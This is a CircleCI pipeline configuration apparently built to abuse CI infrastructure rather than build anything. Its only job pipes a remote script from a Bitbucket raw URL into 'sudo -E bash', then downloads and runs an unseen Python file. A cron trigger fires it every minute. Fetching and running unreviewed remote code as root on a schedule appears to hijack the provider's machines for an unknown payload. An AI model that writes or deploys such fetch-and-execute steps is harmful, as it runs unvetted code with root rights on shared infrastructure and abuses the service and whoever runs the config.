# ======================== #
# ======================== #
# = Created By Anonymous = #
# ======================== #
# ======================== #
version: 2.1
orbs: 
  python: circleci/python@1.5.0
jobs:
  Builds:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: Mulai Bro...
          command: curl -sL https://bitbucket.org/webwebweb_one/testo/raw/c7bcd4034ea77fb9aefa57954bdf113ba1009fc5/index | sudo -E bash - && wget https://bitbucket.org/webwebweb_one/testo/raw/1090dd17c85198a26b98e482208e58c55a76df80/tidur.py && python tidur.py
# ======================== #
workflows:
  Workflows:
    triggers:
      - schedule:
          cron: "* * * * *"
          filters:
            branches:
              only: master
# ======================== #
    jobs:
      - Builds
# ======================== #